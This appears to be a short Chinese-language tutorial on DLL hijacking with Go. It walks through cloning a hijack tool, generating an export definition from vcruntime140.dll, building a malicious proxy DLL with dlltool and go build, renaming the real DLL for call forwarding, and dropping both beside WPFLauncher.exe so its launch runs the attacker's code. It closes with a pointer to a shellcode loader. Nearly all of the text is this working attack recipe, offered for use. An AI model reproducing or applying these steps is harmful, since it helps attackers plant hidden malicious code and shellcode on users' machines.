基于go的简单劫持方法
在使用前请确保你系统上有GoLang python MinGW
以vcruntime140.dll为例
git clone https://github.com/famei/go-dllhijack
pip install pefile
python def.py vcruntime140.dll会得到以下输出
将输出的内容复制到win.def内
新建一个bat脚本
dlltool --output-exp win.exp --input-def win.def
set GOOS=windows
set GOARCH=386
set CGO_ENABLED=1
go build -buildmode=c-shared -o vcruntime140.dll -ldflags="-extldflags=-Wl,{文件夹绝对路径}\win.exp -s -w"会得到一个vcruntime140.dll文
将正常的vcruntime140.dll重命名为_vcruntime140.dll
将恶意的vcruntime140.dll和_vcruntime140.dl放在同一目录
这里用WPFLauncher.exe作为演示
双击WPFLauncher.exe程序正常运行 恶意代码被成功执行
使用此go文件配合劫持即可加载shellcode https://github.com/Ne0nd0g/go-shellcode/tree/master/cmd/UuidFromString
#参考文章 #golang实现dll恶意劫持转发